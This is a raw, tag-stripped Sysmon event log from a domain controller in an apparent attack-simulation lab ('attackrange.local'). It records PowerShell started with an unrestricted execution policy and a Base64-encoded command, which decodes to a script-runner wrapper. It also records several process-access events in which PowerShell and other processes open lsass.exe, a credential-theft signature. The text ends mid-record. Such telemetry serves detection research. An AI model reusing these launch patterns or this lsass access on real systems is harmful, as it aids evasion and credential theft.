65001C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E39-5F80-675B-050000000000}0x55b670HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.849{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.849{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.849{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.802{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.802{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.771{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gtcl5ddr.i4m.ps12020-10-09 10:40:57.771 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.755{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3E39-5F80-8B00-000000007F01}47484656C:\Windows\system32\conhost.exe{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.740{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.724{733EE690-3E39-5F80-8D00-000000007F01}48924840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6c2232ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6c1754ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6849de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6e2ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c6512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c63a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6b8328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c4177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6c3e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6c1754ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6aaca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b6aa279(wow64) 154100x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.739{733EE690-3E39-5F80-8E00-000000007F01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E39-5F80-675B-050000000000}0x55b670HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 